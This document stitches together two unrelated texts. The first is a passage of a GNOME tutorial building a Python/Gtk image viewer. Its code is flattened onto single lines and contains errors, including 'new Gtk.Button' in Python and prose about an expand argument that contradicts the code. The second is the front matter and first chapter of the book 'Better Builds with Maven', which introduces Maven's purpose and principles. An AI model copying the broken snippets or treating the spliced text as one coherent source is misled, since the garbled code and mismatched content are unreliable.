The first line imports the Gtk namespace (that is, it includes the Gtk library). The libraries are provided by GObject Introspection (gi), which provides language bindings for many GNOME libraries.
In the __init__ method of the GUI class creates an (empty) Gtk.Window, sets its title and then connects a signal to quit the application once the window is closed. That's pretty simple overall, more on signals later.
Next, destroy is defined which just quits the application. It is called by the destroy signal connected above.
The rest of the file does initialisation for Gtk and displays the GUI.
This code is ready to run, so try it using Run ▸ Execute. It should show you an empty window.
Signals are one of the key concepts in Gtk programming. Whenever something happens to an object, it emits a signal; for example, when a button is clicked it gives off the clicked signal. If you want your program to do something when that event occurs, you must connect a function (a "signal handler") to that signal. Here's an example:
1 2 3 4 5
def button_clicked () : print "you clicked me!" b = new Gtk.Button ("Click me") b.connect_after ('clicked', button_clicked)
The last two lines create a Gtk.Button called b and connect its clicked signal to the button_clicked function, which is defined above. Every time the button is clicked, the code in the button_clicked function will be executed. It just prints a message here.
Widgets (controls, such as buttons and labels) can be arranged in the window by making use of containers. You can organize the layout by mixing different types of containers, like boxes and grids.
A Gtk.Window is itself a type of container, but you can only put one widget directly into it. We would like to have two widgets, an image and a button, so we must put a "higher-capacity" container inside the window to hold the other widgets. A number of container types are available, but we will use a Gtk.Box here. A Gtk.Box can hold several widgets, organized horizontally or vertically. You can do more complicated layouts by putting several boxes inside another box and so on.
There is a graphical user interface designer called Glade integrated in Anjuta which makes UI design really easy. For this simple example, however, we will code everything manually.
Let's add the box and widgets to the window. Insert the following code into the __init__ method, immediately after the window.connect_after line:
1 2 3 4 5
box = Gtk.Box() box.set_spacing (5) box.set_orientation (Gtk.Orientation.VERTICAL) window.add (box)
The first line creates a Gtk.Box called box and the following lines set two of its properties: the orientation is set to vertical (so the widgets are arranged in a column), and the spacing between the widgets is set to 5 pixels. The next line then adds the newly-created Gtk.Box to the window.
So far the window only contains an empty Gtk.Box, and if you run the program now you will see no changes at all (the Gtk.Box is a transparent container, so you can't see that it's there).
To add some widgets to the Gtk.Box, insert the following code directly below the window.add (box) line:
1 2
self.image = Gtk.Image() box.pack_start (self.image, False, False, 0)
The first line creates a new Gtk.Image called image, which will be used to display an image file. As we need that later on in the signal handler, we will define it as a class-wide variable. You need to add image = 0 to the beginning of the GUI class. Then, the image widget is added (packed) into the box container using GtkBox's pack_start method.
pack_start takes 4 arguments: the widget that is to be added to the GtkBox (child); whether the Gtk.Box should grow larger when the new widget is added (expand); whether the new widget should take up all of the extra space created if the Gtk.Box gets bigger (fill); and how much space there should be, in pixels, between the widget and its neighbors inside the Gtk.Box (padding).
Gtk containers (and widgets) dynamically expand to fill the available space, if you let them. You don't position widgets by giving them a precise x,y-coordinate location in the window; rather, they are positioned relative to one another. This makes handling window resizing much easier, and widgets should automatically take a sensible size in most situations.
Also note how the widgets are organized in a hierarchy. Once packed in the Gtk.Box, the Gtk.Image is considered a child of the Gtk.Box. This allows you to treat all of the children of a widget as a group; for example, you could hide the Gtk.Box, which would also hide all of its children at the same time.
Now insert these two lines, below the two you just added:
1 2
button = Gtk.Button ("Open a picture...") box.pack_start (button, False, False, 0)
These lines are similar to the first two, but this time they create a Gtk.Button and add it to box. Notice that we are setting the expand argument (the second one) to False here, whereas it was set to True for the Gtk.Image. This will cause the image to take up all available space and the button to take only the space it needs. When you maximize the window, the button size will remain the same, but the image size will increase, taking up all of the rest of the window.
When the user clicks on the Open Image... button, a dialog should appear so that the user can choose a picture. Once chosen, the picture should be loaded and shown in the image widget.
The first step is to connect the clicked signal of the button to a signal handler function, which we call on_open_clicked. Put this code immediately after the button = Gtk.Button() line where the button was created:
button.connect_after('clicked', self.on_open_clicked)
This will connect the clicked signal to on_open_clicked method that we will define below.
Now we can create the on_open_clicked method. Insert the following into the GUI class code block, after the __init__ method:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
def on_open_clicked (self, button): dialog = Gtk.FileChooserDialog ("Open Image", button.get_toplevel(), Gtk.FileChooserAction.OPEN); dialog.add_button (Gtk.STOCK_CANCEL, 0) dialog.add_button (Gtk.STOCK_OK, 1) dialog.set_default_response(1) filefilter = Gtk.FileFilter () filefilter.add_pixbuf_formats () dialog.set_filter(filefilter) if dialog.run() == 1: self.image.set_from_file(dialog.get_filename()) dialog.destroy()
This is a bit more complicated than anything we've attempted so far, so let's break it down:
The line beginning with dialog creates an Open dialog, which the user can use to choose files. We set three properties: the title of the dialog; the action (type) of the dialog (it's an "open" dialog, but we could have used SAVE if the intention was to save a file; and transient_for, which sets the parent window of the dialog.
The next two lines add Cancel and Open buttons to the dialog. The second argument of the add_button method is the (integer) value that is returned when the button is pressed: 0 for Cancel and 1 for Open.
Notice that we are using stock button names from Gtk, instead of manually typing "Cancel" or "Open". The advantage of using stock names is that the button labels will already be translated into the user's language.
set_default_response determines the button that will be activated if the user double-clicks a file or presses Enter. In our case, we are using the Open button as default (which has the value 1).
The next three lines restrict the Open dialog to only display files which can be opened by Gtk.Image. A filter object is created first; we then add all kinds of files supported by Gdk.Pixbuf (which includes most image formats like PNG and JPEG) to the filter. Finally, we set this filter to be the Open dialog's filter.
dialog.run displays the Open dialog. The dialog will wait for the user to choose an image; when they do, dialog.run will return the value 1 (it would return 0 if the user clicked Cancel). The if statement tests for this.
Assuming that the user did click Open, the next line sets the file property of the Gtk.Image to the filename of the image selected by the user. The Gtk.Image will then load and display the chosen image.
In the final line of this method, we destroy the Open dialog because we don't need it any more.
All of the code you need should now be in place, so try running the code. That should be it; a fully-functioning image viewer (and a whistlestop tour of Python and Gtk) in not much time at all!
If you run into problems with the tutorial, compare your code with this reference code.
Here are some ideas for how you can extend this simple demonstration:
Have the user select a directory rather than a file, and provide controls to cycle through all of the images in a directory.
Apply random filters and effects to the image when it is loaded and allow the user to save the modified image.
GEGL provides powerful image manipulation capabilities.
Allow the user to load images from network shares, scanners, and other more complicated sources.
You can use GIO to handle network file tranfers and the like, and GNOME Scan to handle scanning.
Got a comment? Spotted an error? Found the instructions unclear? Send feedback about this page.
|
https://developer.gnome.org/gnome-devel-demos/stable/image-viewer.py.html.en
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Scenario Marker Support
The Scenario class is a free download on the MSDN Code Gallery Web site. By using Scenario, you can mark the exact beginning and ending points of a section of code that you want to profile. Concurrency Visualizer displays these markers in Threads View, Cores View, and CPU Utilization View. To display the name that you gave the marker, rest the pointer on its horizontal bar.
Concurrency Visualizer supports Scenario markers in both native code and managed code, subject to the following conditions:
The Scenario.Begin, Scenario.BeginNew, and Scenario.End methods are supported. The Scenario.Mark and Scenario.Step methods are not supported.
Scenario markers that have a Nest Level greater than zero are not supported.
One active Scenario instance per thread is tracked. If a Scenario.Begin event is received when a Scenario instance is already active, Concurrency Visualizer will overwrite the old value with the new value. An active Scenario instance will be closed on the first Scenario.End call in the thread, regardless of the Scenario instance it came from.
To add Scenario markers to code
Download Scenario.zip from Scenario Home Page on the MSDN Code Gallery Web site.
Uncompress the file and note where the folder is created.
In your Visual Studio project, add a reference to the appropriate Scenario native or managed .dll file. x86 and x64 versions are provided for both Visual Studio 2008 and Visual Studio 2010.
In managed code, add a using or Imports statement for the Scenario namespace.
In native code, add the Scenario.h file, which is located in the \native\ folder.
Create an instance of the Scenario class on every thread that you want to mark. Use the constructor to add a name for the marker so that it will appear in Concurrency Visualizer.
Call the Begin method where you want to put the beginning marker.
Call the End method where you want to put the end marker.
Run Concurrency Visualizer. The markers should appear in the various views.
For more information about the Scenario class, see the documentation on the Scenario Home Page.
|
https://msdn.microsoft.com/en-us/library/dd984115(v=vs.100).aspx
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
I regularly have to work with XML files which are presented without line breaks which makes tracking down errors much harder than it needs to be. eg
<:
one,two,three,four,five
six,seven,eight,nine,ten
becomes
one,two ,three,four,five
six,seven,eight,nine,ten
Any ideas as to how I could do this?
Cheers,Mick
Hi Mick,
I use the following plugin for tidying XML. If there is a filename in the clipboard it will tidy that file, otherwise it will tidy the active view. It will only tidy a file if it contains well-formed xml (without this restriction I had a problem with clobbering non-xml files). You might want to play with the command line parameters passed to the tidy program it uses.
This works on Windows only; it requires the "tidy" application (from tidy.sourceforge.net). Ideally it would be changed to use one of the python XML-tidy libraries, but I wasn't sure (1) how to include an external dependency and (2) which library to use.
Anyway, hope it helps.
Cheers,
Josh
'''
.
Disclaimer:
This comes with no warranty. Use at your own risk.
Installation:
Download and install tidy.sourceforge.net and update the path below accordingly (TIDY_EXE)
Add the appropriate keyboard shortcuts from "Preferences" \ "User Key Bindings":
{ "keys": "alt+t"], "command": "xml_tidy" }
'''
import sublime, sublime_plugin
import os
from subprocess import Popen
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
TIDY_EXE = 'C:/path/to/tidy.exe'
class XmlTidyCommand(sublime_plugin.TextCommand):
def run(self, edit):
"""If there is a filename in the clipboard then tidy it, otherwise tidy the current view"""
clip = sublime.get_clipboard()
filepath = (clip if os.path.isfile(clip) else self.view.file_name())
self.tidy_file(filepath)
def tidy_file(self, filepath):
"""
Gets the filename of the current view and tries to tidy it.
The tidy will only be attempted for well-formed XML documents.
For command-line options, see
"""
if not os.path.isfile(filepath):
self.alert('Unable to tidy the current file. Please save the file first.')
elif self.is_well_formed(filepath):
self.alert('Tidying file "%s"' % (filepath))
Popen('"%s" -q -xml -i -u -m -w 120 "%s"' % (TIDY_EXE, os.path.normpath(filepath)))
else:
self.alert('Aborting tidy - the file does not contain well-formed xml ("%s")' % (filepath))
def is_well_formed(self, filepath):
"""Adopted from:"""
parser = make_parser()
parser.setContentHandler(ContentHandler())
well_formed = True
try:
parser.parse(filepath)
except Exception, e:
well_formed = False
return well_formed
def alert(self, message):
"""Display a status message in Sublime Text and also write to the console"""
print 'XmlTidy: ' + message
sublime.status_message(message)
Thanks for that Josh, I'll give it a try.
...and here is a plugin for the 'convert to fixed column' functionality. The plugin will take each selection and apply the "fixed columns" formatting independently. To apply this to a whole file, just 'select all' then run the plugin. If you don't like the results then an undo will being you back to the previous state.
I'm new to python so there may be more efficient ways to do this, but it seems to work. It was a fun problem to solve and learn a bit more about python. Definitely a cool language.
'''
.
'''
import sublime_plugin
SPLIT_CHAR = ','
# convert_to_fixed_column
class ConvertToFixedColumnCommand(sublime_plugin.TextCommand):
def run(self, edit):
for region in self.view.sel():
self.view.replace(edit, region, self.align_content(self.view.substr(region)))
def align_content(self, content):
# calculate the max width for each column
lines = ]
widths = ]
for text in iter(content.splitlines()):
line = text.split(SPLIT_CHAR)
lines.append(line)
for (cell_idx, cell_val) in enumerate(line):
if cell_idx >= len(widths):
widths.append(0)
widths[cell_idx] = max(widths[cell_idx], len(cell_val))
# format each cell to the max width
output = ]
for line in lines:
for col_idx in range(len(line)):
mask = '%%0%ds' % (widths[col_idx])
line[col_idx] = mask % line[col_idx]
output.append(SPLIT_CHAR.join(line))
# make sure that the trailing newline is saved (if there was one)
if content.endswith('\n'):
output.append('')
return '\n'.join(output)
Many thanks for that, Josh, it's much appreciated.
|
https://forum.sublimetext.com/t/formatting-data/1544/3
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
John. I'd like to thank my family for their continuous support. Elena Renard and Joakim Erdfelt for their many contributions to the book. Ruel Loehr. Jason. and the teammates during my time at Softgal. Emmanuel Venisse and John Tolentino. Stephane Nicoll. Allan Ramirez. Felipe Leme. Also. Thanks also to all the people in Galicia for that delicious food I miss so much when traveling around the world. Napoleon Esmundo C. Tim O'Brien. Lester Ecarma. Bill Dudney. Abel Rodriguez. It is much appreciated. Carlos Sanchez Many thanks to Jesse McConnell for his contributions to the book. All of us would like to thank Lisa Malgeri. we would like to thank all the reviewers who greatly enhanced the content and quality of this book: Natalie Burdick.I would like to thank professor Fernando Bellas for encouraging my curiosity about the open source world. especially my parents and my brother for helping me whenever I needed. Fabrice Bellingard. Mark Hobson. Chris Berry. Ramirez. David Blevins. for accepting my crazy ideas about open source. Brett and Carlos . Vincent. Jerome Lacoste. Finally.
and in 2005. John Casey became involved in the Maven community in early 2002. When he's not working on Maven. where he is the technical director of Pivolis. roasting coffee. Brett has become involved in a variety of other open source projects. John enjoys amateur astrophotography. Australia. and is a Member of the Apache Software Foundation. software development. Additionally. Florida with his wife. when he began looking for something to make his job as Ant “buildmeister” simpler. Carlos Sanchez received his Computer Engineering degree in the University of Coruña. discovering Maven while searching for a simpler way to define a common build process across projects. Emily. In addition to his work on Maven. He enjoys cycling and raced competitively when he was younger. which has led to the founding of the Apache Maven project. joining the Maven Project Management Committee (PMC) and directing traffic for both the 1. financial. This is Vincent's third book. a company which specializes in collaborative offshore software development using Agile methodologies. CSSC. Jason van Zyl focuses on improving the Software Development Infrastructure associated with medium to large scale projects. as well as to various Maven plugins. Brett Porter has been involved in the Apache Maven project since early 2003. of course..About the Authors Vincent Massol has been an active participant in the Maven community as both a committer and a member of the Project Management Committee (PMC) since Maven's early days in 2002. where he hopes to be able to make the lives of other developers easier. John was elected to the Maven Project Management Committee (PMC). Brett is a co-founder and the Director of Engineering at Mergere. specializing in open source consulting. Vincent has directly contributed to Maven's core. He continues to work directly on Maven and serves as the Chair of the Apache Maven Project Management Committee. . John lives in Gainesville. supporting both European and American companies to deliver pragmatic solutions for a variety of business problems in areas like e-commerce.. and today a large part of John's job focus is to continue the advancement of Maven as a premier software development tool.0 major releases. he founded the Jakarta Cactus project-a simple testing framework for server-side Java code and the Cargo project-a J2EE container manipulation framework. Jason van Zyl: As chief architect and co-founder of Mergere. published by O'Reilly in 2005 (ISBN 0-596-00750-7). telecommunications and. his focus in the Maven project has been the development of Maven 2. published by Manning in 2003 (ISBN 1-930-11099-5) and Maven: A Developer's Notebook. Build management and open source involvement have been common threads throughout his professional career. Brett became increasingly involved in the project's development. he is a co-author of JUnit in Action. Inc.0 and 2. Immediately hooked. Spain. Vincent lives and works in Paris. He was invited to become a Maven committer in 2004. Inc. He is grateful to work and live in the suburbs of Sydney. Since 2004. He created his own company. and working on his house. and started early in the open source technology world.
This page left intentionally blank. .
Maven’s Principles 1. Using Project Inheritance 3.1. Coherent Organization of Dependencies Local Maven repository Locating dependency artifacts 22 22 23 24 25 26 27 27 28 28 28 31 32 34 1. Packaging and Installation to Your Local Repository 2. Creating Applications with Maven 38 39 40 42 44 46 48 49 52 53 54 55 3.2. Using Snapshots 3.6. Resolving Dependency Conflicts and Using Version Ranges 3.2.2.4.1.2. Using Maven Plugins 2. Convention Over Configuration Standard Directory Layout for Projects One Primary Output Per Project Standard Naming Conventions 1. Reuse of Build Logic Maven's project object model (POM) 1. Handling Classpath Resources 2.3.8. What is Maven? 1.1.1.3. Preventing Filtering of Binary Resources 2.6.1.4.1. Maven's Origins 1. Compiling Application Sources 2.1. Maven Overview 1. Introducing Maven 17 21 1. Setting Up an Application Directory Structure 3.1.2. Introduction 3. Getting Started with Maven 35 37 2. Summary 3. What Does Maven Provide? 1.3. Utilizing the Build Life Cycle 3. Creating Your First Maven Project 2. Compiling Test Sources and Running Unit Tests 2.5.5.2. Filtering Classpath Resources 2.1.2.3.6.6.Table of Contents Preface 1.3.8. Handling Test Classpath Resources 2. Maven's Benefits 2.2.2. Preparing to Use Maven 2.6.7. Using Profiles 56 56 59 61 64 65 69 70 9 .3.7. Managing Dependencies 3.
Bootstrapping into Plugin Development 5. Summary 5.9. Deploying with SSH2 3. Building a Web Application Project 4.2. Building J2EE Applications 74 74 75 75 76 77 78 84 85 4. Introduction 4.3.9. Deploying with an External SSH 3. Deploying with FTP 3.11. Introduction 5.9. Plugin Development Tools Choose your mojo implementation language 5. Deploying Web Applications 4. Deploying with SFTP 3. Improving Web Development Productivity 4.3.2.2.4.1. Deploying to the File System 3.3.9.10. BuildInfo Example: Notifying Other Developers with an Ant Mojo The Ant target The mojo metadata file 141 141 141 142 142 145 146 147 148 148 149 10 .5. Testing J2EE Application 4.4.13.14.3. Deploying a J2EE Application 4.9.3. Developing Custom Maven Plugins 86 86 87 91 95 100 103 105 108 114 117 122 126 132 133 5.11.3. Deploying EJBs 4.3. BuildInfo Example: Capturing Information with a Java Mojo Prerequisite: Building the buildinfo generator project Using the archetype plugin to generate a stub plugin project The mojo The plugin POM Binding to the life cycle The output 5. Organizing the DayTrader Directory Structure 4.2. Introducing the DayTrader Application 4.1. Building an EAR Project 4.6.3.10.4. Creating a Web Site for your Application 3.12.9.5.9. Deploying your Application 3.1.7.2. The Plugin Framework Participation in the build life cycle Accessing build information The plugin descriptor 5. Summary 4.1. Building a Web Services Client Project 4. Building an EJB Project 4.4.1. Developing Your First Mojo 5.4. A Review of Plugin Terminology 5. A Note on the Examples in this Chapter 134 134 135 135 136 137 137 138 140 140 5.8. Building an EJB Module With Xdoclet 4.
3.5. Accessing Project Sources and Resources Adding a source directory to the build Adding a resource to the build Accessing the source-root list Accessing the resource list Note on testing source-roots and resources 5.2. Summary 6.8. Advanced Mojo Development 5.2. Monitoring and Improving the Health of Your Releases 6.9.7.12. Monitoring and Improving the Health of Your Source Code 6. What Does Maven Have to do With Project Health? 6. Attaching Artifacts for Installation and Deployment 153 153 154 154 155 156 157 158 159 160 161 163 163 5. Creating a Standard Project Archetype 7. Assessing Project Health with Maven 165 167 6.1.1. The Issues Facing Teams 7.6.2.5.2.5. Cutting a Release 7. Creating a Shared Repository 7. Adding Reports to the Project Web site 6.7. Summary 8.5. Summary 7. Separating Developer Reports From User Documentation 6.5.1. Creating POM files 242 242 244 250 11 .3. Viewing Overall Project Health 6.9.Modifying the plugin POM for Ant mojos Binding the notify mojo to the life cycle 150 152 5. Where to Begin? 8. Creating Reference Material 6. Introduction 8.8.1.4.6.11.1. Introducing the Spring Framework 8. Choosing Which Reports to Include 6.4.3. Continuous Integration with Continuum 7. Creating an Organization POM 7. Team Collaboration with Maven 168 169 171 174 180 182 186 194 199 202 206 206 207 7.6.4. Monitoring and Improving the Health of Your Dependencies 6.5. Migrating to Maven 208 209 212 215 218 228 233 236 240 241 8.1. Accessing Project Dependencies Injecting the project dependency set Requiring dependency resolution BuildInfo example: logging dependency versions 5. Configuration of Reports 6.5. Gaining Access to Maven APIs 5. How to Set up a Consistent Developer Environment 7.3. Monitoring and Improving the Health of Your Tests 6.10. Team Dependency Management Using Snapshots 7.
Ant Metadata Syntax Appendix B: Standard Conventions 272 272 273 273 274 274 278 278 279 279 283 B.2. Using Ant Tasks From Inside Maven 8.6. Mojo Parameter Expressions A. The site Life Cycle Life-cycle phases Default Life Cycle Bindings 266 266 266 268 269 270 270 270 271 271 271 A. Compiling Tests 8.7. Some Special Cases 8.6.2.6.3. The default Life Cycle Life-cycle phases Bindings for the jar packaging Bindings for the maven-plugin packaging A.5.8.2.2. Standard Directory Structure B.5.1.1.4.2. Testing 8. Summary Appendix A: Resources for Plugin Developers 250 254 254 256 257 257 258 258 261 263 263 264 264 265 A.4. Running Tests 8. Building Java 5 Classes 8. Complex Expression Roots A.2. Restructuring the Code 8. Other Modules 8.1.2.5.1. Maven’s Super POM B. Non-redistributable Jars 8.1. Compiling 8.2.1.6.6. Java Mojo Metadata: Supported Javadoc Annotations Class-level annotations Field-level annotations A.8.6.1.2. Referring to Test Classes from Other Modules 8.3. Maven’s Default Build Life Cycle Bibliography Index 284 285 286 287 289 12 . Simple Expressions A. The clean Life Cycle Life-cycle phases Default life-cycle bindings A. Avoiding Duplication 8.1.1.2.4.3.2. Maven's Life Cycles A. The Expression Resolution Algorithm Plugin metadata Plugin descriptor syntax A.6.5.5.6.
This page left intentionally blank. 16 .
this guide is written to provide a quick solution for the need at hand.Preface Preface Welcome to Better Builds with Maven. Maven 2 is a product that offers immediate value to many users and organizations. For first time users. Perhaps. it is recommended that you step through the material in a sequential fashion. but Maven shines in helping teams operate more effectively by allowing team members to focus on what the stakeholders of a project require -leaving the build infrastructure to Maven! This guide is not meant to be an in-depth and comprehensive resource but rather an introduction. 17 . This guide is intended for Java developers who wish to implement the project management and comprehension capabilities of Maven 2 and use it to make their day-to-day work easier and to get help with the comprehension of any Java-based project. As you will soon find.x). For users more familiar with Maven (including Maven 1. Maven works equally well for small and large projects.0. an indispensable guide to understand and use Maven 2. reading this book will take you longer. which provides a wide range of topics from understanding Maven's build platform to programming nuances. We hope that this book will be useful for Java project managers as well. it does not take long to realize these benefits.
Finally. From there. discusses Maven's monitoring tools. Introducing Maven. and install those JARs in your local repository using Maven. and document for reuse the artifacts that result from a software project. including a review of plugin terminology and the basic mechanics of the Maven plugin framework. After reading this second chapter. At the same time. Chapter 7. Chapter 3 builds on that and shows you how to build a real-world project. looks at Maven as a set of practices and tools that enable effective team communication and collaboration. illustrates Maven's best practices and advanced uses by working on a real-world example application. Web Services). you will be revisiting the Proficio application that was developed in Chapter 3. you will be able to keep your current build working. In this chapter. compiling and packaging your first project. goes through the background and philosophy behind Maven and defines what Maven is. EAR. In this chapter you will learn to set up the directory structure for a typical application and the basics of managing an application's development with Maven. Creating Applications with Maven. These tools aid the team to organize. Assessing Project Health with Maven. the chapter covers the tools available to simplify the life of the plugin developer. Chapter 6 discusses project monitoring issues and reporting. After reading this chapter. Team Collaboration with Maven. Building J2EE Applications. Chapter 7 discusses using Maven in a team development environment. reporting tools. create JARs. explains a migration path from an existing build in Ant to Maven. you will be able to take an existing Ant-based build. Chapter 1. how to use Maven to build J2EE archives (JAR. Chapter 6. Migrating to Maven. they discuss what Maven is and get you started with your first Maven project. it discusses the various ways that a plugin can interact with the Maven build environment and explores some examples.Better Builds with Maven Organization The first two chapters of the book are geared toward a new user of Maven 2. Chapter 2. At this stage you'll pretty much become an expert Maven user. Chapter 3. and how to use Maven to generate a Web site for your project. Chapter 8. Chapter 5. and how to use Maven to deploy J2EE archives to a container. You will learn how to use Maven to ensure successful team development. shows how to create the build for a full-fledged J2EE application. focuses on the task of writing custom plugins. Chapter 4. and learning more about the health of the project. and Chapter 8 shows you how to migrate Ant builds to Maven. Chapter 4 shows you how to build and deploy a J2EE application. EJB. Chapter 5 focuses on developing plugins for Maven. compile and test the code. It starts by describing fundamentals. Getting Started with Maven. Developing Custom Maven Plugins. WAR. 18 . split it into modular components if needed. visualize. gives detailed instructions on creating. you should be up and running with Maven.
Once at the site. so occasionally something will come up that none of us caught prior to publication. go to. post an update to the book’s errata page and fix the problem in subsequent editions of the book.com and locate the View Book Errata link.mergere.com. On this page you will be able to view all errata that have been submitted for this book and posted by Maven editors. We offer source code for download. 19 .mergere. click the Get Sample Code link to obtain the source code for the book. However. You can also click the Submit Errata link to notify us of any errors that you might have found. We’ll check the information and.0 installed.Preface Errata We have made every effort to ensure that there are no errors in the text or in the code.com. if appropriate. So if you have Maven 2. errata. How to Contact Us We want to hear about any errors you find in this book.mergere. and technical support from the Mergere Web site at. we are human. Simply email the information to community@mergere. then you're ready to go. How to Download the Source Code All of the source code used in this book is available for download at. To find the errata page for this book.com.
Better Builds with Maven This page left intentionally blank. 20 .. but not any simpler. .Albert Einstein 21 .
Better Builds with Maven 1. to view it in such limited terms is akin to saying that a web browser is nothing more than a tool that reads hypertext. What is Maven? Maven is a project management framework. While you are free to use Maven as “just another build tool”. and software. “Well.” 22 . distribution. This book focuses on the core tool produced by the Maven project. but the term project management framework is a meaningless abstraction that doesn't do justice to the richness and complexity of Maven. and deploying project artifacts. In addition to solving straightforward. testing. 1 You can tell your manager: “Maven is a declarative project management tool that decreases your overall time to market by effectively leveraging cross-project intelligence. It simultaneously reduces your duplication effort and leads to higher code quality . they expect a short. it will prime you for the concepts that are to follow. to distribution. Maven also brings with it some compelling second-order benefits. It is a combination of ideas. sound-bite answer. Perhaps you picked up this book because someone told you that Maven is a build tool. Maven 2. you can stop reading now and skip to Chapter 2. what exactly is Maven? Maven encompasses a set of build standards. From compilation. richer definition of Maven read this introduction. standards. and with repetition phrases such as project management and enterprise software start to lose concrete meaning. It provides a framework that enables easy reuse of common build logic for all projects following Maven's standards. Don't worry.1. Revolutionary ideas are often difficult to convey with words.. uninspiring words. to team collaboration. and many developers who have approached Maven as another build tool have come away with a finely tuned build system. Maven provides the necessary abstractions that encourage reuse and take much of the work out of project builds. 1. first-order problems such as simplifying builds. but this doesn't tell you much about Maven. So. It defines a standard life cycle for building. Maven Overview Maven provides a comprehensive approach to managing software projects. and the technologies related to the Maven project. If you are reading this introduction just to find something to tell your manager1. Maven can be the build tool you need. When someone wants to know what Maven is. it is a build tool or a scripting framework. to documentation. a framework that greatly simplifies the process of managing a software project. are beginning to have a transformative effect on the Java community.1. an artifact repository model. If you are interested in a fuller. Too often technologists rely on abstract phrases to capture complex topics in three or four words. It's the most obvious three-word definition of Maven the authors could come up with.1. You may have been expecting a more straightforward answer. and the deployment process.” Maven is more than three boring. documentation. Maven.
The build process for Tomcat was different than the build process for Struts. distribution. While there were some common themes across the separate builds. the barrier to entry was extremely high. Maven entered the scene by way of the Turbine project. as much as it is a piece of software. generating documentation. common build strategies. for a project with a difficult build system.Introducing Maven As more and more projects and products adopt Maven as a foundation for project management.2. to answer the original question: Maven is many things to many people. Developers at the ASF stopped figuring out creative ways to compile. Prior to Maven. and package software. developers were building yet another build system. Soon after the creation of Maven other projects. and Web site generation. each community was creating its own build systems and there was no reuse of build logic across projects. Instead of focusing on creating good component libraries or MVC frameworks. predictable way. In addition. Once you get up to speed on the fundamentals of Maven. started focusing on component development. and instead. Ultimately. 1. this copy and paste approach to build reuse reached a critical tipping point at which the amount of work required to maintain the collection of build systems was distracting from the central task of developing high-quality software. they did not have to go through the process again when they moved on to the next project. If you followed the Maven Build Life Cycle. Maven provides standards and a set of patterns in order to facilitate project management through reusable. This lack of a common approach to building software meant that every new project tended to copy and paste another project's build system. So. Maven is a way of approaching a set of software as a collection of highly-interdependent components. The same standards extended to testing. Using Maven has made it easier to add external dependencies and publish your own project components. Whereas Ant provides a toolbox for scripting builds. your project gained a build by default. it becomes easier to understand the relationships between projects and to establish a system that navigates and reports on these relationships. test. Maven is not just a build tool. and deploying. The ASF was effectively a series of isolated islands of innovation. and not necessarily a replacement for Ant.1. you will wonder how you ever developed without it. It is a set of standards and an approach to project development. and the Turbine developers had a different site generation process than the Jakarta Commons developers. Maven's Origins Maven was borne of the practical desire to make several projects at the Apache Software Foundation (ASF) work in the same. which can be described in a common format. projects such as Jakarta Taglibs had (and continue to have) a tough time attracting developer interest because it could take an hour to configure everything in just the right way. generating metrics and reports. and it immediately sparked interest as a sort of Rosetta Stone for software project management. Many people come to Maven familiar with Ant. knowing clearly how they all worked just by understanding how one of the components worked. so it's a natural association. but Maven is an entirely different creature from Ant. Developers within the Turbine project could freely move between subcomponents. Once developers spent time learning how one project was built. 23 . Maven's standard formats enable a sort of "Semantic Web" for programming projects. It is the next step in the evolution of how individuals and organizations collaborate to create software systems. Maven's standards and centralized repository model offer an easy-touse naming system for projects. such as Jakarta Commons. every project at the ASF had a different approach to compilation. the Codehaus community started to adopt Maven 1 as a foundation for project management.
more reusable. 1. install) is effectively delegated to the POM and the appropriate plugins. to provide a common layout for project documentation. if your project currently relies on an existing Ant build script that must be maintained.3. The key value to developers from Maven is that it takes a declarative approach rather than requiring developers to create the build process themselves. if you've learned how to drive a Jeep. assemble. What Does Maven Provide? Maven provides a useful abstraction for building software in the same way an automobile provides an abstraction for driving. Maven takes a similar approach to software projects: if you can build one Maven project you can build them all. Maven provides you with: • A comprehensive model for software projects • Tools that interact with this declarative model Maven provides a comprehensive model that can be applied to all software projects. and much more transparent. An individual Maven project's structure and contents are declared in a Project Object Model (POM). and if you can apply a testing plugin to one project. in order to perform the build. Much of the project management and build orchestration (compile. and output. documentation. and you gain access to expertise and best-practices of an entire industry. more maintainable. which forms the basis of the entire Maven system. declarative build approach tend to be more transparent. existing Ant scripts (or Make files) can be complementary to Maven and used through Maven's plugin architecture. You describe your project using Maven's model. 24 . you can apply it to all projects. and to retrieve project dependencies from a shared storage area makes the building process much less time consuming. and easier to comprehend.1. Plugins allow developers to call existing Ant scripts and Make files and incorporate those existing functions into the Maven build life cycle. the car provides a known interface. referred to as "building the build". test. Projects and systems that use Maven's standard. Maven allows developers to declare life-cycle goals and project dependencies that rely on Maven’s default structures and plugin capabilities. you can easily drive a Camry. When you purchase a new car. Developers can build any given project without having to understand how the individual plugins work (scripts in the Ant world). and the software tool (named Maven) is just a supporting element within this model.Better Builds with Maven However. Maven’s ability to standardize locations for source files. Given the highly inter-dependent nature of projects in open source. The model uses a common project “language”.
it is improbable that multiple individuals can work productively together on a project. when code is not reused it is very hard to create a maintainable system. and focus on building the application. You will see these principles in action in the following chapter. • • • Without these advantages. but also for software components.Organizations that adopt Maven can stop “building the build”. there is little chance anyone is going to comprehend the project as a whole.Maven is built upon a foundation of reuse. Maven projects are more maintainable because they follow a common. 25 .Maven allows organizations to standardize on a set of best practices. Without visibility it is unlikely one individual will know what another has accomplished and it is likely that useful code will not be reused. As mentioned earlier. and aesthetically consistent relation of parts. home-grown build systems. When you adopt Maven you are effectively reusing the best practices of an entire industry. along with a commensurate degree of frustration among team members. This is a natural effect when processes don't work the same way for everyone. when you create your first Maven project. Further.Maven lowers the barrier to reuse not only for build logic. The definition of this term from the American Heritage dictionary captures the meaning perfectly: “Marked by an orderly. Each of the principles above enables developers to describe their projects at a higher level of abstraction. logical. Developers can jump between different projects without the steep learning curve that accompanies custom. publicly-defined model. 1. Agility .2. Because Maven projects adhere to a standard model they are less opaque. Maven’s Principles According to Christopher Alexander "patterns help create a shared language for communicating insight and experience about problems and their solutions". Maven makes it is easier to create a component and then integrate it into a multi-project build. Maintainability .“ Reusability . This chapter will examine each of these principles in detail.Introducing Maven Organizations and projects that adopt Maven benefit from: • Coherence . Maven provides a structured build life cycle so that problems can be approached in terms of this structure. The following Maven principles were inspired by Christopher Alexander's idea of creating a shared language: • Convention over configuration • Declarative execution • Reuse of build logic • Coherent organization of dependencies Maven provides a shared language for software development projects. allowing more effective communication and freeing team members to get on with the important work of creating value at the application level. When everyone is 